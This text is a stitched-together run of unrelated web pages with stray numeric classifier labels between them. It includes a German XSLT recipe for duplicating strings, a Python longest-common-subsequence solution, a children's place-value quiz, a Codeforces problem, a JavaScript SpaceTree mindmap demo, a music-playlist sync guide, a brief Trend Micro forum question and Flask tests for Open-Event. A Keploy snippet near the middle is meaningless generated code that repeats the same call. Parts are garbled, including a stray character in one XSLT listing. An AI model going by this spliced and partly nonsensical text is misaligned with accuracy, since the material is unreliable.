Einen String n-mal duplizieren (Auszug aus "XSLT Kochbuch" von Sal Mangano) Problem Sie müssen einen String n-mal duplizieren, wobei n ein Parameter ist. Zum Beispiel müssen Sie einen String mit Leerzeichen auffüllen, um eine bestimmte Ausrichtung zu erreichen. Lösung XSLT 1.0 Eine schöne Lösung ist ein rekursiver Ansatz, der den Eingabestring so lange verdoppelt, bis er die erforderliche Länge erreicht hat, wobei sorgfältig Fälle behandelt werden, in denen $count ungerade ist: <xsl:template name="dup"> <xsl:param name="input"/> <xsl:param name="count" select="2"/> <xsl:choose> <xsl:when test="not($count) or not($input)"/> <xsl:when test="$count = 1"> <xsl:value-of select="$input"/> </xsl:when> <xsl:otherwise> <!-- Wenn $count ungerade ist, wird eine zusätzliche Kopie der Eingabe angehängt --> <xsl:if test="$count mod 2"> <xsl:value-of select="$input"/> </xsl:if> <!-- Rekursives Anwenden des Templates nach dem Verdoppeln der Eingabe und dem Halbieren des Zählers --> <xsl:call-template name="dup"> <xsl:with-param name="input" select="concat($input,$input)"/> <xsl:with-param name="count" select="floor($count div 2)"/> </xsl:call-template> </xsl:otherwise> </xsl:choose> </xsl:template> XSLT 2.0 In 2.0 können wir das Duplizieren ziemlich einfach mit einem for-Ausdruck erledigen. Wir überladen dup, um das Verhalten des vorgegebenen Arguments in der XSLT 1.0-Implementierung zu replizieren: <xsl:function name="ckbk:dup"> <xsl:param name="input" as="xs:string"/> <xsl:sequence select="ckbk:dup($input,2)"/> </xsl:function> <xsl:function name="ckbk:dup"> <xsl:param name="input" as="xs:string"/> <xsl:param name="count" as="xs:integer"/> <xsl:sequence select="string-join(for $i in 1 to $count return $input,'')"/> </xsl:function> Diskussion XSLT 1.0 Die offensichtlichste Methode, um einen String $count-mal zu duplizieren, besteht darin, eine Möglichkeit zu ermitteln, den String $count-1-mal mit sich selbst zu verketten. Dies kann mit Hilfe des folgenden Codes rekursiv erledigt werden, allerdings ist dieser Code für größere $count-Werte sehr aufwändig und wird deshalb nicht empfohlen: <xsl:template name="slow-dup"> <xsl:param name="input"/> <xsl:param name="count" select="1"/> <xsl:param name="work" select="$input"/> <xsl:choose> <xsl:when test="not($count) or not($input)"/> <xsl:when test="$count=1"> <xsl:value-of select="$work"/>< </xsl:when> <xsl:otherwise> <xsl:call-template name="slow-dup"> <xsl:with-param name="input" select="$input"/> <xsl:with-param name="count" select="$count - 1"/> <xsl:with-param name="work" select="concat($work,$input)"/> </xsl:call-template> </xsl:otherwise> </xsl:choose> </xsl:template> Ein besserer Ansatz wird in der Lösung oben gezeigt. Die Lösung beschränkt die Anzahl der rekursiven Aufrufe und Verkettungen auf die Größenordnung log2($count), indem wiederholt die Eingabe verdoppelt und der Zähler halbiert werden, solange der Zähler größer als 1 ist. Die slow-dup-Implementierung ist heikel, da sie einen künstlichen Arbeitsparameter erfordert, um die ursprüngliche Eingabe zu beobachten. Sie kann außerdem aufgrund der Rekursion von $count-1 ein Stack-Wachstum zur Folge haben und erfordert $count-1-Aufrufe von concat(). Vergleichen Sie das mit dup, das das Stack-Wachstum auf floor(log2($count)) beschränkt und nur ceiling(log2($count))-Aufrufe von concat() verlangt. Anmerkung: Zugunsten der slow-dup-Technik lässt sich anbringen, dass sie auch verwendet wird, um zusätzlich zu den Strings auch die Struktur zu duplizieren, wenn wir xsl:value-of durch xsl:copy-of ersetzen. Das schnellere dup besitzt in diesem Fall keinen Vorteil, da die Kopien als Parameter übergeben werden, was aufwändig ist. Eine andere Lösung, die auf dem Code des EXSLT-str:padding beruht, damit aber nicht identisch ist, sieht so aus: <xsl:template name="dup"> <xsl:param name="input"/> <xsl:param name="count" select="1"/> <xsl:choose> <xsl:when test="not($count) or not($input)" /> <xsl:otherwise> <xsl:variable name="string" select="concat($input, $input, $input, $input, $input, $input, $input, $input, $input, $input)"/> <xsl:choose> <xsl:when test="string-length($string) &gt;= $count * string-length($input)"> <xsl:value-of select="substring($string, 1, $count * string-length($input))" /> </xsl:when> <xsl:otherwise> <xsl:call-template name="dup"> <xsl:with-param name="input" select="$string" /> <xsl:with-param name="count" select="$count div 10" /> </xsl:call-template> </xsl:otherwise> </xsl:choose> </xsl:otherwise> </xsl:choose> </xsl:template> Diese Implementierung legt zehn Kopien der Eingabe an. Wenn dieser Ansatz mehr erreicht, als erforderlich ist, stutzt er das Ergebnis auf die gewünschte Größe. Ansonsten wendet er das Template rekursiv an. Diese Lösung ist langsamer, da sie oft mehr Verkettungen vornimmt, als notwendig sind, und sie verwendet substring(), das bei manchen XSLT-Implementierungen langsam sein kann. Im Rezept Text ersetzen finden Sie eine Erklärung. Die Lösung erweist sich für solche Prozessoren als vorteilhaft, die die Endrekursion nicht optimieren, da sie die Anzahl der rekursiven Aufrufe deutlich verringert. Siehe auch Die sogenannte Piez-Methode kann einen String ebenfalls ohne Rekursion duplizieren. Diese Methode wird im Artikel XSLT – Efficient Programming Techniques (PDF) besprochen. Sie verwendet eine for-each-Schleife auf jeder verfügbaren Quelle von Knoten (oft auf dem Stylesheet selbst). Obwohl diese Methode in der Praxis außerordentlich effektiv sein kann, finde ich sie unzulänglich, da sie davon ausgeht, dass genügend Knoten zur Verfügung stehen, um die erforderliche Iteration auszuführen.    << zurückvor >>       Tipp der data2type-Redaktion: Zum Thema XSLT bieten wir auch folgende Schulungen zur Vertiefung und professionellen Fortbildung an: Copyright © 2006 O'Reilly Verlag GmbH & Co. KG Für Ihren privaten Gebrauch dürfen Sie die Online-Version ausdrucken. Ansonsten unterliegt dieses Kapitel aus dem Buch "XSLT Kochbuch" denselben Bestimmungen, wie die gebundene Ausgabe: Das Werk einschließlich aller seiner Teile ist urheberrechtlich geschützt. Alle Rechte vorbehalten einschließlich der Vervielfältigung, Übersetzung, Mikroverfilmung sowie Einspeicherung und Verarbeitung in elektronischen Systemen. O'Reilly Verlag GmbH & Co. KG, Balthasarstraße 81, 50670 Köln, kommentar(at)oreilly.de
__label__pos
0.763524
DEV Community Abhishek Chaudhary Abhishek Chaudhary Posted on Longest Common Subsequence Given two strings text1 and text2, return the length of their longest common subsequence. If there is no common subsequence, return 0. A subsequence of a string is a new string generated from the original string with some characters (can be none) deleted without changing the relative order of the remaining characters. • For example, "ace" is a subsequence of "abcde". A common subsequence of two strings is a subsequence that is common to both strings. Example 1: Input: text1 = "abcde", text2 = "ace" Output: 3 Explanation: The longest common subsequence is "ace" and its length is 3. Example 2: Input: text1 = "abc", text2 = "abc" Output: 3 Explanation: The longest common subsequence is "abc" and its length is 3. Example 3: Input: text1 = "abc", text2 = "def" Output: 0 Explanation: There is no such common subsequence, so the result is 0. Constraints: • 1 <= text1.length, text2.length <= 1000 • text1 and text2 consist of only lowercase English characters. SOLUTION: class Solution: def lcs(self, text1: str, text2: str, i, j) -> int: if (i, j) in self.cache: return self.cache[(i, j)] if i >= len(text1) or j >= len(text2): self.cache[(i, j)] = 0 return 0 if text1[i] == text2[j]: self.cache[(i, j)] = 1 + self.lcs(text1, text2, i + 1, j + 1) return self.cache[(i, j)] else: a = self.lcs(text1, text2, i + 1, j) b = self.lcs(text1, text2, i, j + 1) self.cache[(i, j)] = max(a, b) return self.cache[(i, j)] def longestCommonSubsequence(self, text1: str, text2: str, i = 0, j = 0) -> int: self.cache = {} return self.lcs(text1, text2, 0, 0) Enter fullscreen mode Exit fullscreen mode Top comments (0)
__label__pos
0.999923
    Count Tens and Ones Within 100 Add to Fav Rate 0 stars Quiz size: Message preview: Someone you know has shared quiz with you: To play this quiz, click on the link below: https://www.turtlediary.com/quiz/count-tens-and-ones-within-100.html?app=1?topicname... To know more about different quizzes, please visit www.turtlediary.com Hope you have a good experience with this site and recommend to your friends too. Login to rate activities and track progress. Login to rate activities and track progress. Remember the relation:   10 ones = 1 ten   3 a   Let's consider an example. Let's write the tens and ones in the number 56.   56 = ___ ten(s) + ___ one(s) We need to find the missing numbers in the above sentence.   We have:   56 = 50 + 6 = 5 tens + 6 ones   So, the missing numbers are 5 and 6. ds A B C D E F G H I J K L M N O P Q R S T U V W X Y Z Help The correct answer is Remember : The smallest number is the one that comes first while counting. Solution : To arrange the given numbers in order from smallest to greatest, find the smallest number among all the given numbers. 21,27,23 21 is the smallest number.
__label__pos
0.982914
Sync Deezer with Hearthis.at Replace automatically Deezer playlist tracks on a Hearthis.at playlist How to keep in sync a playlist from Deezer to Hearthis.at ? The steps below can help you to create a synchronization between a Deezer playlist and a Hearthis.at playlist. After your synchronization was created, daily/weekly/monthly, your Deezer playlist tracks will be automatically merged in your Hearthis.at playlist. Premium Playlists Synchronize 1. Open the Web App Open 2. Click on the Synchronize tool () in left panel of the interface 3. Select your Deezer source playlist (if no Deezer playlists was show you have maybe to connect this platform) 4. Select Hearthis.at as destination service (and connect this platform) 5. Select the Hearthis.at playlist (you can create directly a new playlist by selecting 'New playlist') 6. Configure your synchronization (start date/time, frequency, method) 7. Confirm to create your synchronization (you can show the detail in 'My syncs' tab in the left panel) See your syncs How to keep in sync a recent Deezer to Hearthis.at transfer ? You have recently converted a Deezer playlist to Hearthis.at and now you want to keep this two playlist in sync ? The steps below can help you : Premium Playlists Synchronize 1. Open the Web App Open 2. Go to your recent transfers See your recent transfers 3. Find the Deezer to Hearthis.at transfer you want to keep synchronize and click on Keep Sync () 4. Configure your synchronization (start date/time, frequency, method) 5. Confirm to create your synchronization (you can show the detail in 'My syncs' tab in the left panel) See your syncs Take a look to our explanation page to know more about Sync, update playlists automatically across streaming services.
__label__pos
0.973024
How to use _Dependency_name method of generated Package Best Keploy code snippet using generated._Dependency_name _Dependency_name Using AI Code Generation copy Full Screen 1var dep = new _Dependency_name();2dep.doSomething();3var dep = new _Dependency_name();4dep.doSomething();5var dep = new _Dependency_name();6dep.doSomething();7var dep = new _Dependency_name();8dep.doSomething();9var dep = new _Dependency_name();10dep.doSomething();11var dep = new _Dependency_name();12dep.doSomething();13var dep = new _Dependency_name();14dep.doSomething();15var dep = new _Dependency_name();16dep.doSomething();17var dep = new _Dependency_name();18dep.doSomething();19var dep = new _Dependency_name();20dep.doSomething();21var dep = new _Dependency_name();22dep.doSomething();23var dep = new _Dependency_name();24dep.doSomething();25var dep = new _Dependency_name();26dep.doSomething();27var dep = new _Dependency_name();28dep.doSomething();29var dep = new _Dependency_name();30dep.doSomething();31var dep = new _Dependency_name();32dep.doSomething(); Full Screen Full Screen _Dependency_name Using AI Code Generation copy Full Screen 1import (2func main() {3dependency.Dependency_name()4}5import (6func main() {7dependency.Dependency_name()8}9I don't want to import the same dependency twice. Is there a way to make it work? Full Screen Full Screen Automation Testing Tutorials Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc. LambdaTest Learning Hubs: YouTube You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts. Run Keploy automation tests on LambdaTest cloud grid Perform automation testing on 3000+ real desktop and mobile devices online. Most used method in
__label__pos
0.946103
Codeforces celebrates 10 years! We are pleased to announce the crowdfunding-campaign. Congratulate us by the link https://codeforces.com/10years. × E. Beautiful Subarrays time limit per test 3 seconds memory limit per test 512 megabytes input standard input output standard output One day, ZS the Coder wrote down an array of integers a with elements a1,  a2,  ...,  an. A subarray of the array a is a sequence al,  al  +  1,  ...,  ar for some integers (l,  r) such that 1  ≤  l  ≤  r  ≤  n. ZS the Coder thinks that a subarray of a is beautiful if the bitwise xor of all the elements in the subarray is at least k. Help ZS the Coder find the number of beautiful subarrays of a! Input The first line contains two integers n and k (1 ≤ n ≤ 106, 1 ≤ k ≤ 109) — the number of elements in the array a and the value of the parameter k. The second line contains n integers ai (0 ≤ ai ≤ 109) — the elements of the array a. Output Print the only integer c — the number of beautiful subarrays of the array a. Examples Input 3 1 1 2 3 Output 5 Input 3 2 1 2 3 Output 3 Input 3 3 1 2 3 Output 2
__label__pos
0.918169
Skip to content Instantly share code, notes, and snippets. @ufologist Created September 17, 2013 07:21 Show Gist options • Save ufologist/6591008 to your computer and use it in GitHub Desktop. Save ufologist/6591008 to your computer and use it in GitHub Desktop. 参考SpaceTree的示例, 实现类似脑图(mindmap)效果 <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title>Spacetree - Mindmap Demo</title> <link rel="stylesheet" href="spacetree.css" /> <style> #infovis { height: 600px; margin-left: auto; margin-right: auto; background-color: #111; } #infovis .node { cursor: pointer; color: #333; font-size: 0.8em; padding: 3px; } </style> <!-- 依靠excanvas来解决IE不支持canvas的问题 --> <!--[if IE]> <script src="http://philogb.github.io/jit/static/v20/Jit/Extras/excanvas.js"></script> <![endif]--> </head> <body> <h1>Spacetree - Mindmap Demo</h1> <div id="infovis"></div> <!-- JIT Library File --> <script src="http://philogb.github.io/jit/static/v20/Jit/jit-yc.js"></script> <script src="spacetree-mindmap-demo.js"></script> </body> </html> /** * Simplest Templating Engine * * https://github.com/trix/nano */ function nano(template, data) { return template.replace(/\{([\w\.]*)\}/g, function(str, key) { var keys = key.split("."), v = data[keys.shift()]; for (var i = 0, l = keys.length; i < l; i++) v = v[keys[i]]; return (typeof v !== "undefined" && v !== null) ? v : ""; }); } // 渲染节点内容的模版 var tpl = '<span>{name}({unit}): {value}</span><br /><span>环比: {ratio}%</span>'; // 测试数据 var nodes = { id: 'node01', name: tpl, data: { // 节点的扩展数据, 可依据这些值来渲染节点的样式 name: '收入', unit: '元', value: 26000, ratio: -4.7 }, children: [{ id: 'node11', name: tpl, data: { name: '收入1', unit: '元', value: 5000, ratio: -5.1 }, children: [{ id: 'node111', name: tpl, data: { name: '收入11', unit: '元', value: 2000, ratio: -5.3 } }, { id: 'node112', name: tpl, data: { name: '收入12', unit: '元', value: 1000, ratio: 2.2 } }, { id: 'node113', name: tpl, data: { name: '收入13', unit: '元', value: 2000, ratio: -3.5 } }] }, { id: 'node12', name: tpl, data: { name: '收入2', unit: '元', value: 8000, ratio: 2.5 } }, { id: 'node13', name: tpl, data: { name: '收入3', unit: '元', value: 6000, ratio: 2.3 } }, { id: 'node14', name: tpl, data: { name: '收入4', unit: '元', value: 7000, ratio: -2.3 }, children: [{ id: 'node141', name: tpl, data: { name: '收入41', unit: '元', value: 4000, ratio: -1.3 } }, { id: 'node142', name: tpl, data: { name: '收入42', unit: '元', value: 1000, ratio: 2.1 } }, { id: 'node143', name: tpl, data: { name: '收入43', unit: '元', value: 2000, ratio: -3.9 } }] }] }; /** * 参考SpaceTree的示例, 实现类似脑图(mindmap)效果 * http://philogb.github.io/jit/static/v20/Jit/Examples/Spacetree/example1.html */ (function() { // Create a new Spacetree instance // http://philogb.github.io/jit/static/v20/Docs/files/Visualizations/Spacetree-js.html var st = new $jit.ST({ // id of viz container element injectInto: 'infovis', // set duration for the animation duration: 800, // set animation transition type transition: $jit.Trans.Quart.easeInOut, // Whether to show the entire tree when loaded // or just the number of levels specified by levelsToShow. // Default’s true. // 关系到是否可以展开多个节点 // http://stackoverflow.com/questions/4223415/how-do-i-prevent-the-javascript-infovis-spacetree-st-select-method-from-coll constrained: false, // The number of levels to show for a subtree, Default’s 2 levelsToShow: 1, // set distance between node and its children levelDistance: 50, // enable panning Navigation: { enable:true, panning:true }, // 节点和连接线都是通过canvas画出来的 Node: { type: 'rectangle', align: 'left', autoWidth: true, autoHeight: true, overridable: true // for styling individual nodes or edges }, Edge: { type: 'bezier', overridable: true }, Tips: { enable: true, type: 'HTML', offsetX: 10, offsetY: 10, onShow: function(tip, node) { tip.innerHTML = nano(node.name, node.data); } }, // This method is called on DOM label creation. // Use this method to add event handlers and styles to your node. onCreateLabel: function(label, node) { label.innerHTML = nano(node.name, node.data); label.onclick = function() { st.onClick(node.id); }; // SpaceTree expand/collapse behaviour // https://groups.google.com/forum/#!topic/javascript-information-visualization-toolkit/pHblraFbFuI // 实现点击节点可以展开/收起, 效果还不是很理想 // label.onclick = function() { // console.log(node._collapsed, node.collapsed); // if (node._collapsed === undefined || node._collapsed === true) { // st.op.expand(node, { // type: 'animate', // duration: 1000, // hideLabels: false, // transition: $jit.Trans.Quart.easeOut // }); // st.onClick(node.id); // node._collapsed = false; // node.collapsed = false; // } else { // st.op.contract(node, { // type: 'animate', // duration: 1000, // hideLabels: false, // transition: $jit.Trans.Quart.easeOut // }); // node._collapsed = true; // node.collapsed = true; // } // }; }, // This method is called right before plotting a node. // It's useful for changing an individual node // style properties before plotting it. // The data properties prefixed with a dollar // sign will override the global node style properties. onBeforePlotNode: function(node) { //add some color to the nodes in the path between the //root node and the selected node. if (node.selected) { node.data.$color = '#ff7'; } else { // 这里可以实现根据节点的扩展数据来渲染节点样式 delete node.data.$color; // if the node belongs to the last plotted level // if(!node.anySubnode('exist')) { //count children number // var count = 0; // node.eachSubnode(function(n) { count++; }); //assign a node color based on //how many children it has // node.data.$color = ['#aaa', '#baa', '#caa', '#daa', '#eaa', '#faa'][count]; // } } }, // This method is called right before plotting // an edge. It's useful for changing an individual edge // style properties before plotting it. // Edge data proprties prefixed with a dollar sign will // override the Edge global style properties. onBeforePlotLine: function(adj){ if (adj.nodeFrom.selected && adj.nodeTo.selected) { adj.data.$color = '#eed'; adj.data.$lineWidth = 3; } else { delete adj.data.$color; delete adj.data.$lineWidth; } }, onBeforeCompute: function(node) { // console.log('loading', node.name); }, onAfterCompute: function(){ // console.log('done'); } }); // load data st.loadJSON(nodes); // compute node positions and layout st.compute(); // optional: make a translation of the tree st.geom.translate(new $jit.Complex(-200, 0), 'current'); // emulate a click on the root node. st.onClick(st.root); // 测试调整tree方位(Tree Orientation) // setTimeout(function() { // st.switchPosition('top', 'animate'); // setTimeout(function() { // st.switchPosition('right', 'animate'); // setTimeout(function() { // st.switchPosition('bottom', 'animate'); // }, 6000); // }, 5500); // }, 5000); })(); .jit-autoadjust-label { padding: 5px; } .tip { color: #111; background-color: white; border:1px solid #ccc; -moz-box-shadow:#555 2px 2px 8px; -webkit-box-shadow:#555 2px 2px 8px; -o-box-shadow:#555 2px 2px 8px; box-shadow:#555 2px 2px 8px; opacity:0.9; filter:alpha(opacity=90); font-size:10px; font-family:Verdana, Geneva, Arial, Helvetica, sans-serif; padding:7px; } @ufologist Copy link Author 预览效果 spacetree mindmap demo Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
__label__pos
0.996139
L Neophyte Neophyte  •  1 Message  •  100 Points Monday, April 17th, 2023 2:38 PM Help How is someone scraping the key off the app forcing me back into a trial version? Is there not a password to protect the app from any changes being made on iPhone? Brand User Trend Security Expert  •  11 Messages  •  550 Points 2 months ago Hi @leonard_masi_jr, Welcome to Trend Micro Community! It's unclear what exactly you mean by "scraping the key off the app". However, I'll try to provide an answer that may be helpful. Trend Micro Mobile Security will not automatically go back to a trial version unless the app has been reinstalled.  If you are already signed in, sign out of the app, then sign in again to update your subscription. To check your subscription, kindly log in on this link Let us know how it goes. Need Help? Ask the Community Latest Tech Insights Loading...
__label__pos
0.615875
Writing tests for Open-Event As our application and code base increased it became necessary to write tests for each functionality. Earlier we had tests only for basic functionalities like creating an event, editing an event, but then it is very important and also beneficial if we have tests for each and every small functionality. Hence we started writing proper tests. We divivded the tests into three folder • API • Functionality • Views All the API related tests were in the above one whereas the basic functionalities were in the second one. The last folder was further divided into three parts • Admin Tests • Super-Admin Tests • Guest Pages We had to test each and every functionality. For example let us look at the test file for the events. It looks like this: class TestEvents(OpenEventViewTestCase): def test_events_list(self): with app.test_request_context(): url = url_for('events.index_view') rv = self.app.get(url, follow_redirects=True) self.assertTrue("Manage Events" in rv.data, msg=rv.data) def test_events_create(self): with app.test_request_context(): url = url_for('events.create_view') rv = self.app.get(url, follow_redirects=True) self.assertTrue("Create Event" in rv.data, msg=rv.data) def test_events_create_post(self): with app.test_request_context(): custom_forms = ObjectMother.get_custom_form() url = url_for('events.create_view') data = POST_EVENT_DATA.copy() del data['copyright'] data['start_date'] = '07/04/2016' data['start_time'] = '19:00' data['end_date'] = '07/04/2016' data['end_time'] = '22:00' data['custom_form[name]'] = ['session_form', 'speaker_form'] data['custom_form[value]'] = [custom_forms.session_form, custom_forms.speaker_form] rv = self.app.post(url, follow_redirects=True, buffered=True, content_type='multipart/form-data', data=data) self.assertTrue(POST_EVENT_DATA['name'] in rv.data, msg=rv.data) def test_events_create_post_publish(self): with app.test_request_context(): url = url_for('events.create_view') data = POST_EVENT_DATA.copy() del data['copyright'] data['start_date'] = '07/04/2016' data['start_time'] = '19:00' data['end_date'] = '07/04/2016' data['end_time'] = '22:00' data['state'] = 'Published' rv = self.app.post(url, follow_redirects=True, buffered=True, content_type='multipart/form-data', data=data) self.assertTrue('unpublish' in rv.data, msg=rv.data) def test_events_create_post_publish_without_location_attempt(self): with app.test_request_context(): custom_forms = ObjectMother.get_custom_form() url = url_for('events.create_view') data = POST_EVENT_DATA.copy() del data['copyright'] data['start_date'] = '07/04/2016' data['start_time'] = '19:00' data['end_date'] = '07/04/2016' data['end_time'] = '22:00' data['location_name'] = '' data['state'] = u'Published' data['custom_form[name]'] = ['session_form', 'speaker_form'] data['custom_form[value]'] = [custom_forms.session_form, custom_forms.speaker_form] rv = self.app.post(url, follow_redirects=True, buffered=True, content_type='multipart/form-data', data=data) self.assertTrue('To publish your event please review the highlighted fields below' in rv.data, msg=rv.data) def test_events_edit(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") custom_forms = ObjectMother.get_custom_form(event.id) save_to_db(custom_forms, "Custom forms saved") url = url_for('events.edit_view', event_id=event.id) data = POST_EVENT_DATA.copy() del data['copyright'] data['name'] = 'EditTestName' data['start_date'] = '07/04/2016' data['start_time'] = '19:00' data['end_date'] = '07/04/2016' data['end_time'] = '22:00' data['custom_form[name]'] = ['session_form', 'speaker_form'] data['custom_form[value]'] = [custom_forms.session_form, custom_forms.speaker_form] rv = self.app.post(url, follow_redirects=True, buffered=True, content_type='multipart/form-data', data=data) self.assertTrue('EditTestName' in rv.data, msg=rv.data) def test_event_view(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") url = url_for('events.details_view', event_id=event.id) rv = self.app.get(url, follow_redirects=True) self.assertTrue("event1" in rv.data, msg=rv.data) microlocation = ObjectMother.get_microlocation(event_id=event.id) track = ObjectMother.get_track(event_id=event.id) cfs = ObjectMother.get_cfs(event_id=event.id) save_to_db(track, "Track saved") save_to_db(microlocation, "Microlocation saved") save_to_db(cfs, "Call for speakers saved") rv = self.app.get(url, follow_redirects=True) self.assertTrue("event1" in rv.data, msg=rv.data) def test_event_publish(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") url = url_for('events.publish_event', event_id=event.id) rv = self.app.get(url, follow_redirects=True) event = DataGetter.get_event(event.id) self.assertEqual("Published", event.state, msg=event.state) def test_event_unpublish(self): with app.test_request_context(): event = ObjectMother.get_event() event.state = "Published" save_to_db(event, "Event saved") url = url_for('events.unpublish_event', event_id=event.id) rv = self.app.get(url, follow_redirects=True) event = DataGetter.get_event(event.id) self.assertEqual("Draft", event.state, msg=event.state) def test_event_delete(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") url = url_for('events.trash_view', event_id=event.id) rv = self.app.get(url, follow_redirects=True) self.assertTrue("Your event has been deleted" in rv.data, msg=rv.data) def test_event_copy(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") url = url_for('events.copy_event', event_id=event.id) rv = self.app.get(url, follow_redirects=True) self.assertTrue("Copy of event1" in rv.data, msg=rv.data) if __name__ == '__main__': unittest.main() So this is the test file for the event part. As you can see we have tests for each and every small functionality 1. test_events_list : Tests the list of events 2. test_events_create: Tests whether the event creation page is displayed 3. test_events_create_post: Tests whether the event is created on doing a POST 4. test_events_create_post_publish : Tests whether the event is published on doing a POST through Publish button 5. test_events_copy: Tests whether the event is copied properly or not Thus each functionality related to an event is tested properly. Similarly not just for events but also for the other services like sessions: import unittest from tests.api.utils_post_data import POST_SESSION_DATA, POST_SPEAKER_DATA from tests.object_mother import ObjectMother from open_event import current_app as app from open_event.helpers.data import save_to_db from flask import url_for from tests.views.view_test_case import OpenEventViewTestCase class TestSessionApi(OpenEventViewTestCase): def test_sessions_list(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") session = ObjectMother.get_session(event.id) save_to_db(session, "Session Saved") url = url_for('event_sessions.index_view', event_id=event.id, session_id=session.id) rv = self.app.get(url, follow_redirects=True) self.assertTrue("Sessions" in rv.data, msg=rv.data) self.assertTrue("test" in rv.data, msg=rv.data) def test_session_create(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") custom_form = ObjectMother.get_custom_form(event.id) save_to_db(custom_form, "Custom form saved") url = url_for('event_sessions.create_view', event_id=event.id) rv = self.app.get(url, follow_redirects=True) self.assertTrue("Create Session" in rv.data, msg=rv.data) def test_session_create_post(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") custom_form = ObjectMother.get_custom_form(event.id) save_to_db(custom_form, "Custom form saved") data = POST_SESSION_DATA data.update(POST_SPEAKER_DATA) url = url_for('event_sessions.create_view', event_id=event.id) rv = self.app.post(url, follow_redirects=True, buffered=True, content_type='multipart/form-data', data=data) self.assertTrue(data['title'] in rv.data, msg=rv.data) def test_session_edit(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") custom_form = ObjectMother.get_custom_form(event.id) save_to_db(custom_form, "Custom form saved") session = ObjectMother.get_session(event.id) save_to_db(session, "Session saved") url = url_for('event_sessions.edit_view', event_id=event.id, session_id=session.id) rv = self.app.get(url, follow_redirects=True) self.assertTrue("Edit Session" in rv.data, msg=rv.data) def test_session_edit_post(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") custom_form = ObjectMother.get_custom_form(event.id) save_to_db(custom_form, "Custom form saved") session = ObjectMother.get_session(event.id) save_to_db(session, "Session saved") data = POST_SESSION_DATA data['title'] = 'TestSession2' url = url_for('event_sessions.edit_view', event_id=event.id, session_id=session.id) rv = self.app.post(url, follow_redirects=True, buffered=True, content_type='multipart/form-data', data=data) self.assertTrue("TestSession2" in rv.data, msg=rv.data) def test_session_accept(self): with app.test_request_context(): session = ObjectMother.get_session() save_to_db(session, "Session Saved") url = url_for('event_sessions.accept_session', event_id=1, session_id=session.id) rv = self.app.get(url, follow_redirects=True) self.assertTrue("The session has been accepted" in rv.data, msg=rv.data) def test_session_reject(self): with app.test_request_context(): session = ObjectMother.get_session() save_to_db(session, "Session Saved") url = url_for('event_sessions.reject_session', event_id=1, session_id=session.id) rv = self.app.get(url, follow_redirects=True) self.assertTrue("The session has been rejected" in rv.data, msg=rv.data) def test_session_delete(self): with app.test_request_context(): session = ObjectMother.get_session() save_to_db(session, "Session Saved") url = url_for('event_sessions.delete_session', event_id=1, session_id=session.id) rv = self.app.get(url, follow_redirects=True) self.assertTrue("deleted" in rv.data, msg=rv.data) def test_session_view(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event) session = ObjectMother.get_session() session.event_id = event.id save_to_db(session, "Session Saved") url = url_for('event_sessions.session_display_view', event_id=event.id, session_id=session.id) rv = self.app.get(url, follow_redirects=True) self.assertTrue("Short abstract" in rv.data, msg=rv.data) def test_wrong_form_config(self): with app.test_request_context(): event = ObjectMother.get_event() save_to_db(event, "Event saved") url = url_for('event_sessions.create_view', event_id=event.id) rv = self.app.get(url, follow_redirects=True) self.assertFalse("incorrectly configured" in rv.data, msg=rv.data) if __name__ == '__main__': unittest.main() We see that there are tests for each functionality of the sessions. However these tests were simple to write. However there was problem in one aspect of writing tests. In the Event creation wizard there are steps where the sponsors, tracks, rooms are dynamically added to the event. How then should we test them. I wrote the test for the creation of sponsors in step -2 def test_events_create_post(self): with app.test_request_context(): custom_forms = ObjectMother.get_custom_form() url = url_for('events.create_view') data = POST_EVENT_DATA.copy() del data['copyright'] data['sponsors[name]'] = ['Sponsor 1', 'Sponsor 2'] data['sponsors[type]'] = ['Gold', 'Silver'] data['sponsors[url]'] = ["", ""] data['sponsors[description]'] = ["", ""] data['sponsors[level]'] = ["", ""] data['start_date'] = '07/04/2016' data['start_time'] = '19:00' data['end_date'] = '07/04/2016' data['end_time'] = '22:00' data['custom_form[name]'] = ['session_form', 'speaker_form'] data['custom_form[value]'] = [custom_forms.session_form, custom_forms.speaker_form] data = ImmutableMultiDict(data) rv = self.app.post(url, follow_redirects=True, buffered=True, content_type='multipart/form-data', data=data) self.assertTrue(POST_EVENT_DATA['name'] in rv.data, msg=rv.data) rv2 = self.app.get(url_for('events.details_view', event_id=1)) self.assertTrue(data['sponsors[name]'] in rv2.data, msg=rv2.data) Here on importing the data dict I dynamically add two sponsors to the dict. After that I convert the dict to an Immutablemulti-dict so that the multiple sponsors can be displayed. Then I pass this dict to the event creation view via a POST request and check whether the two sponsors are present in the details page or not. Thus our test system is developed and improving. Still as we develop more functionalities we will write more tests 🙂  
__label__pos
0.977198
